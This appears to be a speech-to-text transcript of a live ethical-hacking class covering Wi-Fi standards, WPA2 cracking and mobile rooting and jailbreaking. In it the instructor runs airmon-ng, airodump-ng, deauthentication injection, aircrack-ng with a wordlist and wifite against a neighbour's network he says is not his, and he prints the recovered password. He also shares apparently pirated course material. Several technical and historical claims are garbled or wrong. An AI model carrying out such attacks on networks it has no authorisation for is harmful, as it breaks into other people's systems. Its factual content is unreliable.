Hello all, good morning. Am I audible?
Yes, sir.
Good morning, sir.
Yes,
sir.
sir.
Morning.
Sir.
Okay. So today was the test, right?
Yes, sir.
Yes, sir.
Ready?
Yes, sir.
Oh, nice. Okay, so let's first complete the today's topic. We'll start with Wi-Fi hacking, right? And then we'll proceed towards the test. Cool? So let's first go to the theory. Okay, just before that theory, I would like to give you the basic intro of how the test will be, okay? I guess that is the important point which you need to hear, right?
Yes, sir.
So guys, total questions will be 100, okay? Passing will be 70. It will be all MCQ based, okay? And similar to whatever we have gone through earlier. Fine. And for these 100 questions, you are going to get 4 hours. I'm planning to make it 50 so that it can be cleared early as possible, right? What do you think? 50
Yes,
or
sir.
100?
50 is enough, sir.
50, sir. 50 is better, sir.
You know, international CEH exam comes up with 125 questions in 4 hours. So let's make it 100 only in 4 hours. It will be
Yeah,
fun.
okay, sir.
Okay, sir.
Okay. And the exam will start after our session, right? So parallelly today we also have the mock interviews, right? So I guess I don't have any update on the mock interview stuff. Have you got any update like something?
No, sir.
No,
No,
sir.
sir.
No, sir.
No, sir.
Eh, Not sure. One minute. Somebody sent me the mock interview stuff. Likewise, message from Afitag. Below mentioned candidates will be receiving the call tomorrow between 10 a.m. to 6 p.m. Have you received something?
No, sir.
No, sir.
Okay.
No, sir.
Yes.
So the test will be of 100 questions, 70 passing score, MCQ 4 hours. Okay. 50. Passing score will be 35. Three hours. I guess that is more than sufficient, right? 2 hours. Okay, so this will be the test. Keep that noted. Okay. And here right now it's 10. 1 hour will take this session. At 11 or let's say 11:30 you'll start the test, right? And you can appear the test till the night, right? Till let's say 8 p.m. You have to complete the exam. Okay. So we'll start with the mock interview one by one. Okay. It's not like well, everybody will be listening and you have to speak something. No, right? It will be one by one. Okay. So let's see how we can do it. Okay. Let's first complete the test. These all topics were done yesterday, right? I'm talking about Wi-Fi. Okay, it's here. So guys, as you already know, when I'm talking about Wi-Fi and other earlier networks, so we have gone through guided network, that is a cable module where all the network traffic are passing through the cable. But now I'm talking about Wi-Fi. So when I'm talking about Wi-Fi, it goes through RF signals, means radio frequency signals, and it is developed on developed by IEEE 802.11 standards. Okay, it works on some technology called as DSSS, FSHS, OFDM, right? And you guys have even used this type of technologies like infrared, Bluetooth, right? Don't tell me you have not used infrared or Bluetooth something. We are using such technologies in our day-to-day environment, like TV remote is working on infrared, right? Bluetooth, we have used headset, we have used lots of the Bluetooth equipments, devices, mobile to mobile transfer, Bluetooth, right? So it's all Wi-Fi, right? So almost mobile devices uses such environments, and computers also uses such things, right? Using Wi-Fi at public hotspots, Wi-Fi at home, and different modes of Wi-Fi technology. This is an important element. How many types of Wi-Fi standards are available? So Bluetooth, which is having very slow, very short range, 10 meters nearly, and 1 to 3 Mbps. You can say speed we are getting. We have 11A. 11A is like having 54 Mbps, working with 5 gigahertz, which is high. Very less Mbps, right? 54. It is nowadays used in only walkie-talkie by military soldiers, kind of thing. 11B, that is 11 Mbps, and they have reduced the 2.4 gigahertz. The ultimate goal to create this was to reduce the gigahertz size. Then they have combined both of them and created 11G. So here it usually also supports 54 Mbps with the 2.4 gigahertz as a great range. The number of less gigahertz, the range will be higher. Okay. Then 11i is for the security level. It is 11G plus security. Okay, security in sense your Wi-Fi password and all. 11N comes up. 11N comes up with the MIMO technology, multiple input, multiple output technology, which comes up with a 100 Mbps range. So multiple users can get higher speed. Right? 802.16, which is again metropolitan area where VPN and such area wireless connectivity is happening, and the SIM cards, the mobile technology, the mobile phones, you are using towers and all. That is 1116. Then we also have some more, right? If I show you the latest one, see, so we have 11 AC, right, which is again multiple input, multiple output, but with the multiple uh, acceptance, which is having 7000 Mbps of bit rate, right? That which works on 5 gigahertz. 11 AD is also in the picture. Same speed but high gigahertz speed. That is because it requires lots of huge range of MIMO, and you can see it is 10 on 10, right, with MIMO technology, working with OFDM technology. And we have AC, a new version of 11 AC, right? That is again 7000, but range you can see 5 gigahertz, right? And it works with multiple MIMO and 8xx. So it is not yet available for normal users, 11 AC or Wave 2, but we can get 11 AC Wave 1. You can get a easy, or you can say at least 1 to 2 Gbps of connectivity. Many of the users I have seen in the world, which says I have this router, that router, which is supported 1 Gbps, but I am not getting it. So that the reason is the range. The reason is the input capacity. If multiple users are connected, my friends, right? If the router is supporting 1 Gbps, if the multiple users are connected, you might can get division of it. It is a hub technology. Wi-Fi is using bus topology, right? So multiple users are connected, so it will divide the Wi-Fi speed into multiple. So in that case, you have to work with 11 AC routers, right? This one, have a look. Um, so if you are looking for router kind of thing, get this router. Okay, it will be one time costly. You are already getting TP-Link for this 2559 something. Get this type of routers which support Wi-Fi 6 and AX10 something. So it will give you a good range. Okay, per device you will get at least 1 Gbps. It will be very fast. Cool. So when I'm talking about Wi-Fi, it has an SSID. What is SSID? The name of the Wi-Fi. For example, if you see mine, this HR's home is an SSID, right? Which broadcasts the name of the wireless signal. There are two types of authentication in Wi-Fi. Okay, number one, you can use like open system, means without password. Number two is keywords, means if I want to connect, I need to enter the password. There is one more, many of the routers supports Radius as well. Now Radius is an authentication server, right? So router has a lot of things to do, right? So when authentication request comes from the new user, the user sends the request to, like, I want to connect. Access point will send him the EAP request, like give me your username password. If the client gives username password, it will not check by access point or router. It directly send to Radius server with the username password detail. If the Radius server feels everything is good, he will tell the router that okay, the username password is valid, allow him, kind of thing. This is authentication server, dedicated authentic server. Right? There are lots of tools which support this, and Microsoft has inbuilt as well, right? So you can take this. There is one more protocol like this called as ACAS, which is Cisco proprietary. So when I'm talking about authentication process, it is pretty simple. But when I'm talking about Wi-Fi, it has lots of terminologies. You might have used gigabit, hotspot, and kind of thing. right? These are all Wi-Fi indicators which can be used. But if I segregate and make it proper, there are in all of these standards which we have discussed earlier, right? There was the problem, right? With till 11G, it was a problem like you cannot set the password. It will be open standard only, means everybody can connect. Later on, they added 11N, and where 11N comes up with WEP, right? It is wired equivalent privacy, where you can at least enter the numeric password. Okay, so somebody can, nobody can connect without the password. But you see, it can be cracked, right? Because it is a numeric password, brute force can crack it. So, with the new version, WPA comes up to the picture, that is Wi-Fi Protected Access, right? Where they have changed the security, right? Whatever the vulnerability is there in WEP, that is CCMP protocol, they change into TKIP, means Token-Based Authentication Protocol, along with AES, right? And it removes that particular vulnerability. Now it is secure, but still it has two versions: WPA WPA Enterprise and WPA Normal, right? So WPA Normal is used by us as a password where you can add numeric password as well as the character-based password. Okay, but that is also crackable, right? Where but you are using enterprise level, and in enterprise level you can make use of this radius server in order to secure yourselves. In order to secure, as I say, WPA personal can be cracked. So WPA2 personal and WPA2 enterprise is also into the picture, where WPA2 personal can give you the capability of adding strong password, that is numeric characters, symbols, kind of thing. Whereas whereas WPA2 Enterprise can also support Radius, which makes it more comfortable to use with it. So in corporate world, you can see it will be Radius kind of connectivity. In Wi-Fi, there are simple tricks and things like wall walking. Think of it like you have Wi-Fi on in your mobile phone. You are just walking around, and in nearby cyber cafe, the Wi-Fi is on, and you got connected, and it is wall walking. Similar ways, if you are driving somewhere with Wi-Fi on and you stop by somewhere in, let's say, CCD or something, some restaurant, and the Wi-Fi is get connected, that is for driving. Similar in for flying. So in Vistara and such kind of Emirates and such kind of flights, you also have Wi-Fi. So if you get connected and use, you can say why for flying. Wall chalking is a method where symbols are used to show that this area has this particular thing. Kind of, you can say, this licensing, right? Driving license. So you can see wall chalking saying like pay for Wi-Fi, restricted Wi-Fi, symbols. If this is a symbol, it is free Wi-Fi. Okay. So if you want to search for Wi-Fi, you can just on your Wi-Fi and see. There are lots of the hotspot finder as well. There are two types of antenna. There is omnidirectional antenna and parabolic antenna, right? Omnidirectional antenna works with 360 degree. You can see this antenna is there, so it will be 360 degree. Whereas parabolic grid antenna comes up with a single directional, right? With a solid backing of it, right? So it won't work with the back. So if it is passing through this area, it will the users at this area will only get the signal and not the back ones. You can see this one, the bottom one is omnidirectional, which is good. Then we also have Yagi antenna and dipole antenna. Yagi antenna is commonly a unidirectional kind of thing. We are using a lot this type of things in India. Dipole antenna is kindly used as a client communication in site-to-site VPN connectivity. These are some encryption levels which we have just discussed. So, okay, here. Guys, note this, okay? It will be in exam. So in WEP, WPA, WPA2, you can see what encryption standard is used. WEP uses RC4 with a vector size of 24 bits and encryption of very less amount of bit. It also checks read checking, error checking. Okay, WEB is very unsecure because it is using RC4 methodology, which is easily cracked, right? WPA, RC4 plus TKIP, 48-bit, 128-bit encryption length. WPA2 is the most secure one, but you can see it is also cracked. It depends on your password strategy. Okay, let's start with the hacking of Wi-Fi. Okay. Now, one element to crack the Wi-Fi from your laptop. Am I audible?
Yes, sir.
Hello.
Yes, sir.
Yes, sir.
Your VirtualBox or VMware will not support your Wi-Fi adapter. Okay. So if you have Wi-Fi in your laptop or something, it won't support by VirtualBox. Okay. So, and definitely you need something, a Wi-Fi adapter with a you can say promise cut strategy. Okay, dumping module enabled in your Wi-Fi. So there are very less Wi-Fi LAN cards in the world which supports this type of, you can say, cracking. Okay, here are some. Cool. And the best ones are alpha cards, but not all alpha cards can be used for this. Okay, so on Flipkart, Amazon, lots of the people say this is working, this is not working, kind of thing. But if you want to buy for Wi-Fi hacking, right? I have 3-4 devices. I usually purchase and check it. So I'll show you which one to buy. Okay. These are all normal things. Okay. Normal adapters, you can see. Search for Wi-Fi adapter high gain. Okay. So you will get some adapters. You can see Alpha Card 6000. These all things. So these all things doesn't mean it is working. Okay. Don't buy this one. It says like it is working. Partially it is working, but you need to change the driver. Okay. So the one which I am referring to you, let me first get that. This one. You can see I purchased this on 8 December 2020. I still have this. It is working absolutely great. No driver required. You can directly plug into your Kali and it is working fine. It also supports Windows as well. So if you want to use it for normal day-to-day environment, it is fine. Okay. I'm sharing the link in the chat. Usually if you attend any of the Wi-Fi hacking stuff, they say alpha card is required, this is that is, and such things. You see why I refer this, because it is cheap. It is only 898. I purchased at see how much price I purchased. I purchased both of them, right? This is partially working and this is absolutely great. Okay, so buy this one. Okay, if you actually need. Cool. Any question with this, guys?
No, sir.
Yes. No, sir.
Okay. So in order to work with Wi-Fi hacking, we need to open Kali, and we definitely need that adapter. So guys, can you see my screen?
Yes, sir.
Which screen are you using?
Yes, sir.
So you can see this is my adapter. I have multiple adapters, okay? And this is my second one. This is the one which I usually use. It is basically from D-Link. You cannot find this adapter anymore in the market. Okay. And this is the one which I referring to. Don't see my screen. Check out my camera is on.
Sir, no, sir. It's off, sir.
You can see, right?
It's visible, sir.
Yes, sir.
No, sir. No, sir.
See my camera, not my screen. Okay. If you're still unable to see, fine. Let's proceed. So now I'm going to take one of these adapter, specifically Leoxis one. Okay. So now I again share my screen and then tour. Okay. So as you can see, first of all, when I say IW config, there is no Wi-Fi LAN card available. And if you will check, you will also feel the same. As I said earlier, am I audible? Yeah, as I said earlier, your Wi-Fi adapter won't detect. So you need additional adapter like this in order to work with Wi-Fi hacking. Okay. So I'm going to connect one in this, and you have to say devices, and you have to say USB, and you have to select your RA-Link adapter. Now if I select IW config, wait for it to come. Okay. Guys, can you see that? Now it is detected.
Yes, sir.
Yes, sir.
Yes, sir.
So we'll hack into one of these adapter thing. Okay. So that Wi-Fi thing in order to crack the Wi-Fi. Okay. Let me plug my charger. Okay. So there are two ways to hack Wi-Fi adapters. Which one do you want to see? Easy, hard? What do you think?
Both, sir.
Both are good, sir.
Both the ways are actually same, right? One is automated tool which will fire the commands in back, and one is the manual way where you have to go through each of the step-by-step approach and get the things done. Okay, so let's see how we can hack into this Wi-Fi adapter. Now, in order to hack into, see, it depends, okay, what type of encryption you want to break. Okay, so I'll just sudo do. The very first command you have to always do is, see, right now it's in a managed mode, so we will switch into something else. Okay, so you need aircrack utility. So the very first thing is, I'll say airmon-ng. Okay, can you see my screen?
Yes, sir.
Yeah, yes, sir.
Yes, sir.
So when you say airmon-ng enter, you will see what device is capable of working with aircrack ng or airmon-ng utility. Okay, so here you can see my interface name is WLAN 0, right? Same way you can also here check WLAN 0 or iwconfig, whatever. So airmon-ng command is the best for our concept right now, because it will, from among all the interfaces, it will show me which one is capable. Okay, so now what we will do is we will say airmon-ng and say start WLAN 0, right? So what it will do is it will take our adapter into monitoring mode, right, in order to work with all the capturing, Wi-Fi capture. So now if I just say iwconfig, you will see the mode is changed to monitor. Now this is what not all the adapters support. Okay, that's where we need to purchase this one. Getting my point? This is Leoxys one, and the name is also changed. You can see WLAN 0 mon. Guys, okay?
Yes, sir.
Okay, sir.
Yes, sir.
So now what we'll do is we'll say arrow dump -ng WLAN 0 mon. Whatever the name it is coming here, you can take that. Why? Because now it will show me the list of adapters, or you can say SSIDs available in my range, my area. Okay? So wait for the one which you are actually looking for, so that we can crack into that. If you don't feel it is in the list, you can again say Ctrl C and stop it and start it again in order to capture. So it's a lot of the devices, or you can say Wi-Fi I have in here. Okay, so I'll connect to this one. You can see Rascal something looks good. Okay. Guys, fine.
Yes, sir.
Yes, sir.
I'll start a new window. Start it from the top so that we can see the back, this one as well. Come on, open man. Sudo su 2. Okay. हाँ रघु गुड आफ्टरनून मैम लमी मैं तेरा मीटिंग में हूँ बताओ हाँ मेरे को पता है आज का मेल दिया मतलब स्टूडेंट्स ने बताया था कुछ आज है करके ठीक है कल का नहीं पता है आज का ही बोला था कल ही ठीक है ठीक ठीक है ठीक ओके ठीक है okay so guys we are going to hack into this Rascal one, right? So the command will be first we are going to capture all the packets of this Rascal packet, right? So arrow down -ng and you select C option. What is C? C means channel. So you can see Rascal is working on this CH. What is CH? CH is 1, right? So 1. If I want BSSID. What is BSSID? It is a MAC address. So I want this MAC address here. It is. You can even stop it in order to copy this. It is not going to change. Copy. Paste. Okay. And then what you can see the -W to write this packet somewhere. Okay, so I'm going to add it to, let's say, home, Edges, desktop, and I'll just say Rascal. Okay, and capture with WLAN 0 mod. Okay, well, this is not my adapter, okay, or something. It is somewhere I am getting. I'm just hacking it because the name looks good. So we have to capture some packets of this one. Okay, so guys, you have to wait until you can see somebody is connected already, right, with EAPOL something. wait for a while in order to get some more packets. We need some good number of packets. Okay, you can see beacons are very less and data is also very less. We need some sort of good data in order to get connected. Looks like the packets are not traveling, so let me check for whether Rascal is still available or not. You can see it is a mess. What was the MAC address of Rascal one? It's AA6 something. You can see it is not at all found. Can you see that? Doesn't matter. We'll check whatever number of packets we captured. Okay, with this, it is not yet connecting anymore, right? So we'll stop it because we've captured at least some sort of packets, right? So what I'm looking for is, oh, we now found Rascal again. See. Okay, so I'll just start capturing it again. You can see. Rascal is on channel 11 now. So we need to change the 11 number. Okay. So we need to monitor it. Now the one which you can see here at the bottom is some client which is connected, okay? So don't worry on that. If you feel now the packets are going very less, you can again start a new window, okay? And you can perform a replay attack as well. So air replay -9 -E. I want to hack into Rascal, right? E means ESSID, and where is Rascal? RAS, yeah, okay. Rascal -A. A will be the client which is connected. So client ID is here. We'll type it 00:42:38:0E:31:CA. Okay. WLAN 01. If that don't work, we can also take it the first one, AA colon 66 colon 3D colon 91 colon 8C colon F0. What is that? So that is the access point ID. You can see this one. Wait for it until it connects on 11 and see it is working fine now. Cool. And see it is monitoring. Injection is working. Can you see that? So we are getting some more packets now, right? And if that successfully works, what you can do is parallelly you can check whether we get the number of packets we wanted, right? So if you see CD desktop ls, you can get some Rascal packets as well, right? So what I can do is I can say arrow dump minus ng, right? -1 BSSID. This is the BSSID of what we want to hack, minus C11 channel 11 minus W, where the file which we just used in order to crack it. So it is Rascal 0. Which one we have? It has 3 files. You can see 1, 2, 3. So I'll start with Rascal 01.cap and I'll say wlan 0 mon. Sorry, mon. And it requires root permissions, okay? Or sudo. Let's see whether it can crack it or not. Sorry. Arrow dump, error crack, not arrow dump. We don't require such things. Okay. You can see one potential handshake is there. So let's crack with the dictionary. Okay. Minus W. And I'll say rocky.txt will be fine. So user share word list rocky.txt. Oh, we have to crack it first. So gzip minus d user share word list rocky.txt gzip. Permission denied lol. Okay, so now error crack and Rascal 01 cap. Okay, W user share word list rocky. So it is the cracking, and we crack the password. Can you see that, guys? Easy, right?
Yes, sir.
Sir.
It will only crack if you see WPA handshake is found. Okay, if WPA handshake is not found, then it won't crack. Keep that noted. Any questions? Someone was saying something. You want to note the commands?
Yes, sir.
Right? Okay.
Sir.
Starting up with the first command itself in the first adapter here. Okay, see it is still monitoring. I'll just stop it. I'll say history. So we started with here, opening a notepad file so that you can note it. So IW config to see the adapter details, Airborne -NG to see whether it is working, Airborne -NG start to check the adapter, and we have arrow dump -NG to capturing, right? Switching to number 2. Let's see it is still going on. So furthermore, history. So we can use this command in order to capture the packets. Okay. And we can also use, I'm closing this one. Right. We can also use this command in order to inject the packets so that we can connect it. Okay. Later on, or if everything is fine, we can use rcrack command in order to crack it. This one. Okay. So note the commands, guys. So if you see, we didn't crack WEP, okay? We cracked into a WPA2. You can see WPA here, right? And in the earlier stages, if you remember, I closed that window. Rascal is on WPA2, okay? So it is the highest security we can have. This is the password in a clear text format, okay? 1122334455. Note the commands, guys. Is done.
Yes, sir.
Yes, sir.
Yes, sir.
Bring all this command in the chat. So now I'll show you the easy method. Okay. Close all the window. You can see right now if I say IW config, it's saying it is in monitoring mode. So I'll just close arrow mode minus ng stop w WLAN 0 mode. Okay, so now it is back to manage mode. Cool. So I'm going to show you an easy tool called as Wi-Fi T. Enter. You just have to wait and enjoy. It is based on Python. Everything is cool. Okay, just enjoy. It says some process is conflicting. If we get any problem, we'll stop it. And if it is not working, what you can say is this command. Okay, or you can say airmon minus ng check kill. Okay, now start Wi-Fi. You can say pirate this is not found, so we need that. Okay, so it start capturing, you can see. I'm again looking for Rascal only, and I cannot see Rascal in the list. Oh, it's on number 1. Channel number 11, BPS, everything is fine. Oh man. Now we have the list. We are going to hack into number 1. So I'll just say number 1. It will do all the remaining things. We don't need to worry. We just have to read and enjoy. And you can see it is capturing the now handshake now. So if there is one client, you can see, so it will send the authentication packet to that client. So that the client will be de-authenticated, means again disconnected, and when he will again connect back, this will capture the packets. Okay, so no need to worry, it will do the remaining stuff. You just have to wait and enjoy. Oh, see guys, you saw we captured one handshake. Guys, do you like the tool? This is the
Yes,
password.
sir.
Yes.
Only one command. Okay, that is I fight. Fine. And again, this handshake is stored here. You can see this is the PCAP file. You can open this file in Wireshark, but it will be encrypted, and that's where it is cracking it. So that's all from the Wi-Fi hacking, right? I hope you enjoyed. I've shown you multiple ways, right? So it will be more fun. Any questions? You might be thinking
No,
of
sir.
now we need a adapter, right, to crack this thing and all. But definitely
Yes, sir.
see, you need to buy one at least if you want to hack into. It's in your choice, okay? If you see, I've shown you I have multiple, 3 to 4, okay? So let's go to next topic, mobile hacking. One more thing, if you can buy and you want to buy one time, okay, one time investment kind of product, you can go to Z Security website. It has the wireless adapter. You don't need to worry, okay, you don't need to even find which adapters are working, not working. You can buy any of these 6, okay. This one is the best. Why? Because there are multiple which suppose only 2.4 gigahertz, but we are into the world where 5 gigahertz is also into the picture. So purchase one which support both, right? And you can see remaining are pretty big, but this is something which 2 antenna have more signal capturing power. So this one is the awesome one. This is also good. I have this one as well, but it is very costly. This one and this one are same only the look is different. So this one is more better. I am looking to buy this one as well. It is $34. It is not more than 3,000 nearby. Okay, you can see it has monitoring mode, packet injection mode, 5 dpi. It will be more faster in cracking. Okay, it is more fun. You can also add Wi-Fi keystroke injection if you want. Like, so if somebody is connected with Wi-Fi and you want to capture the keylogger kind of thing, okay, so you can do it that as well. It is fine, but that is again too costly, right? So $34 is fine. If you calculate $34 USD to INR, it is not more than 2,800. So it is actually fine, right? When you are already purchasing at 1,000, 1,200 nearly, so one time is always good. What do you think?
Yes, sir.
Yes, sir.
So I'm just sharing the URL as well if you want to buy. So now we'll take 10 minutes of break. Okay. I'm also coming with a tea. Okay. And then we'll start with mobile hacking thing. Okay. See you in 10 minutes,
Okay.
guys. Let's 15 minutes. Okay. Your timer is already set. Hello guys. So let's come to the last more topic of the course, that is hacking wireless, mobile networks. So mobile network is pretty easy. Am I audible?
Yes, sir.
Sir.
Well, yesterday I shared version 12 data with a lot of my students. Did you get the data, guys? Okay, so this is CH version 12. If you want, okay, not compulsory. This data is not yet available online properly. Okay, and the password is this one. Well, it is 36 GB of data. Okay, and the link will expire on 12th of November. Okay, which is today. So if you want to download, you need to download by today itself. Okay, guys.
Okay, sir.
Okay, sir.
So it will be something like, you can see this type of data where 1, 2, 3, 4 only zip will be there, right? And in 4 zips you will have labs, you will have videos, you will have the slides, which you can see right here, right? You can see this is slide one, this one. Okay, so you can get slide, video, lab as well. Cool. If I show you by opening it, it will be, I guess, more beneficial, right? So if you just need to double click on it here, it will be CH version 12, specify the password, ethical hacks. Lab, module and videos. How you can download? Right click here, download. Simple, like this. If I see lab manual, there are lots, 4 lab manuals. Size is less. Select as early as possible. Okay. Modules, you can also see download right here, but I'll prefer not to do like that because it will take a lot of time. Better select one by one, it will be fast. Okay, 20 modules, all the modules are there, mobile hacking, everything. Okay, latest version. Okay, and these are the videos. If you want to refer someday somewhere, it will be easy for you. Okay, you can see web application is one topic is added, IoT hacking. This is new in the market, so it is just basic what is IoT. The theory will be added. Okay, guys. If you don't want, it's your choice. So mobile phones, it is a particular device which is used in a lot of areas. Everybody have mobile phone, whether he is working in a tea stall or he is a bagger or whatever. Everybody in today's life is having a mobile phone because it is very cheap, right? Now there are 2 types of mobile phone you can see in the market. One is Android, one is iOS. Correct? Guys, yes or no?
Yes, sir.
So
Yes, sir.
Android is created, designed by Google. iOS is designed by Apple. But you see both of them are Linux operating system only in background. Okay. So you can hack these both of the devices with Metasploit. with the help of malvertising, right? Or if you want to hack, if you don't need laptop, I don't have laptop for example, so you can install Kali Net Hunter, change your mobile operating system from Android to Kali Net Hunter. See, so it is a Kali for mobile phone, right? Earlier I was using this, so you don't need any tools or anything. It has all the tools installed, right? So you can directly hack into any mobile phone. You can directly hack into WhatsApp and lots of the things. You might have seen lots of the videos online, which is just like cracking the passwords with their mobile phones, right? So it's all done with the help of this. Okay, there are lots of tools and everything is installed. You can hack into Wi-Fi. You can hack into anyone's, you can say numeric lock or symbolic lock or whatever, right? You can hack into any funds. You can create malware. You can use Metasploit, XYZ things. You can see easily menu. You can see all things inside. See hacking Wi-Fi. Wi-Fi is already shown here. Can you see that, guys? Easy, right?
Yes, sir.
It is an awesome operating system, right? I have used a lot. It is unbelievable. It is awesome, right? But you and the steps to install is also specified. Okay, so how to get this? I'm just sharing it. Just check it out. This one. Okay. Now, when I'm talking about, let's discuss about what is see mobile device. In 2012, Trojan was very much used in order to hack into mobile phones or laptops or whatever, right? So why we are using this? Because it is a stock ROM. It is by default installed in Android, or if you purchase iOS, the iPhone, then it is iOS as well. But both are Linux, okay? So it doesn't matter it is Android or iOS, right? Then you can have a breaking the mobile phone means if you have the default operating system, right? You cannot directly hack into it, but usually people do is like rooting, because in your mobile phone you don't have the root access, so you cannot do a lot of the things. So in Android we use rooting in order to get the root access of the mobile phone, and in Linux we use means iOS we use jailbreaking in order to get the root access of the iOS application means iPhone, right? And in jailbreaking we get some more features, right? We can install the other applications which are not in the Apple Store as well. And mobile is the kind of device where in companies and such areas also it is allowed, and everybody brings their own mobile phone and all. So definitely we can use BYOD, means bring your own device, in order to hack into any infrastructure with the help of mobile phone. Nobody checks whether you have Kali installed in your mobile or not. Getting my point? So you get, if you have a mobile phone, you have Kali in your mobile phone, you can easily hack into companies Wi-Fi. You can hack into a lot of the things as well, right? So same strategy in mobile phone. You can see virus, worm, Trojan, backdoor. Same vulnerabilities, everything is same. But when it comes to vulnerability, we usually don't download. There are lots of the application we don't download from the official store, right? So there are lots of the applications on the market, like some marketplaces which are actually not Android marketplace or Google marketplace, but we download it from there because we get MODs, right? Means we get the full software without adware, right or not, guys? Have you used that? MX Player Pro. You have to purchase? So what we can do is we can go to Google and download the APK, install it in our phone, right? How many of you have done this?
Done this, sir.
Yeah, so
Yes, sir. Yeah.
the one you have done this type of thing, so might be that application which you are downloading not from official marketplace might be having malicious thing inside, right? Who knows? And then they might be using your mobile phone, they might be hacking into your mobile phone, you even don't know that, right? And they might be using your phone for zombie activity, means your mobile phone can attack to others, lot of the things. So these are among such of the attacks which are happening in the world. Okay, so I have just said. So threats of mobile malware, you can see at 2012, a lot of the attacks were happening with the help of mobile phones. Okay. Android. What is Android? Android is a software environment developed by Google for mobile applications. But nobody in the market knows that Google never developed Android. Okay. There was a personal, I guess, George Android something, who developed Android based operating system, who took the operating system to Nokia first and asked for Nokia to work with this operating system which he designed. Nokia said no, I am not at all interested in Android. Reason is they have already tied with Microsoft for Windows based operating systems, right? And Microsoft is a big name, right? That's where it plays a big role in Nokia's failure. Later on, the guy performed the particular, you can say, webinars and all such in terms of Android, and Google was interested in getting it. So Google purchased Android from him. He is still getting the royalty of 20%, right? And he is now a billionaire. Okay, because Android you can see everywhere, right? TVs, mobile phones, and smart devices and IoT applications and AC, fridge. Getting my point? Android is everywhere now. Okay, but he is now not using it. He is just helping development and for the new versions and kind of thing. So Android uses Dalvik virtual machine. So you see in mobile phone also some sort of virtualization is happening, right? Where your integrated browser is there, that is WebKit engine. Earlier, now it is Google Chrome. Android also uses SQL Lite database, means there is a database management system called SQL Lite. It supports this media format. It has a rich development. If you want to develop Android application, you can use Eclipse earlier. Now there is a tool called as Android Development Kit. Okay. These are the architecture of Android, where the user are accessing the things in application side. You can see phone contacts, and then there will be some applications for internal resources. For example, resource manager, right? Location manager, GPS kind of thing, which later on select on whatever the tool you are using or selecting goes to the libraries in order to work that and show you the details, and which communicate with the hardware in order to get the data. Okay, earlier when Android comes to the market, you have a Android 2, okay, Android 2.2, you can see Froyo if I say. The name was Froyo. So there was in the settings you can have an option, you can say enable admin, disable admin. If you want the root access of your machine, you can just have admin enable disable. In that case, you get full access, whatever you want, right? Whatever you want to install, no security, everything. Later on, they remove this feature, right, and make your Android more secure. But still, if you want, you can get it with routing methodology. So in order to root your Android to get the full access of your system and you can say perform some administrator level changes in your mobile phones, definitely you can do it with the help of some tools and modifying the device firmware, but it will void your warranty. Might be it can reduce the performance, but as per my expertise, your performance will be increased, right? It can, because you are going to install some other device firmware, it can be malware infected, which can cause you a big issue. Okay, so these are some tools which can easily do the routing. There are two types of routing methodology, one with the laptop, one with the mobile phone itself, right? So if you are working with a laptop, Super One Click is the awesome tool. uh, Super Boot, no, Black Raman is one of the best one. Okay, let me show you something. So without rooting your mobile phone and you don't have root access, you cannot perform hacking with the help of mobile phone. For example, Droid Ship is one of the side jacking tool, right? Earlier we have gone through Burp, right? So this is kind of, you can say, similar monitoring tool. You can say face sniff if you want to get the data of whatever data, similar to Wi-Fi hacking. But if you are connected with any Wi-Fi, you can monitor all the data which are used by other people who are connected to the same Wi-Fi. Right? This is used in the mobile phone, means a Trojan software used in Android. Ginger break, the Trojan tools only. Okay. premium SMS, Droid Live, fake token. Okay, this all is happening in the market because you are using, you are not using the official Google store. But if somebody, you can say, if you lose your mobile phone, you can track where exactly is your mobile phone if your internet is active with the help of My Devices section in Google. Okay, because when you purchase your mobile phone, you log into your email ID. Your mobile phone is automatically added to your Google email ID devices section. So you can track how many devices are logged in with this email ID, and definitely you can, let's say, wipe the data if you are, if there is a, see, mobile phones have critical information, banking information, your personal photos and details. Getting my point? So it, you can wipe the data in order to delete everything in your mobile phone. Okay, if you are not getting the mobile phone. Okay, also you can track where exactly it is. Okay, and there is some software as well called as remote wipe in here in the Google itself, where you can select which mobile phone you have to delete or wipe or format, whatever you say. This is an Android vulnerability scanner, and you know what? It is not working. Okay, these are all the tracking tools to track, let's say, if in our family member we install this tool, this iHound is awesome. Okay, if you install iHound in all of the mobile phones, right, of your family member, you can track where exactly he is right now. Right, so in case of some emergency, something, you don't need to like call him where you are and all. Right, you can track with here and it will connect to Google Map and directly you can go there in order to help him in any of the situation. Right, in iPhone we have a Find My Phone, in Google also we have, but you see that requires some sort, but you need to add your devices, you need to log in all of your email IDs over there. Better to use iHound or such tools which makes our lives more easier to track our people. Similarly, when I'm talking about iOS, this is made by Apple, which is again in Linux based operating system, which has a smooth Cocoa touch, good media devices, and it is, I have not seen an Apple which is hacked or hanged, sorry, HANGED. Our Android phone lots of the time hang, so we need to reboot, but I have not seen Apple iOS like that. So in order to get the root access in the iOS, you need to jailbreak your iOS, right, which can again void and same thing. Okay, warranty will be loose. So in order to perform jailbreak, you have three options: userland, iBoot, boot ROM. In user land, you can only get the user level access, not the kernel or boot level. Right? When you reboot, the jailbreak is again lost. Okay. In iBoot, you can get user level plus booting level. Okay. But it cannot be permanent as well. But in boot ROM, it is like permanent. Okay. Because you are booting with the different kernel. There are two types of jailbreaking: untethered and tethered. I'll prefer to go with untethered. Reason is, you can see in Apple there is a key, okay, to use your SIM cards. Getting my point? Earlier it was happening like if you are taking the mobile phone from America and you are coming India, your SIM providers like Airtel, Idea and such radio frequency cannot be used, cannot be working, right? So what you need to do is you need to perform unlocking, which is extra cost. But now it is not, it is universal, so it is fine. But in untethered, when you perform jailbreak, it shows you that this is the key, please back up. Okay, so that you cannot lost your key in order to work with the SIM providers. But in tethered, you have no longer patched the kernel. Okay, and you can lose your that unlocking key for SIM cards. Getting my point? So untethered is good one. When you perform jailbreaking, Cydia, this is a software, Cydia, can be installed, right, with the help of which you can install millions of softwares in your Apple phone. Okay, it is similar to like admin panel of your mobile phone, and it also have its you can, to get it. It is all personal objects are paid. So in Cydia, you can get it for free. In order to perform jailbreaking, Red Snow, Absinthe, these are all the good tools. I have used Red Snow a lot. It is awesome. But to use such tools, you need IPSW file, which is the operating system file, which you can get it from online, depending on which operating system you want to use. For example, IPSW is a iOS file, right? So I want it for, let's say, iOS 15. You can see, you can go to ipsw.me website, select the version, which version you are looking for. You can see, first of all, check the mobile phone which you are looking. So you can see it is not available, not available, not available. Choose a product first here on the top. Which phone you have? I have, let's say, iPhone. Right now I have iPhone 14 Pro Max. I just purchased. Right, and you can see the IPSW is available for iOS 16 point whatever. This is one. November, June, July, August, September, October, November. This is the latest one, 9 October. So I can get this one too. Okay, it is 6.62 GB. I need to 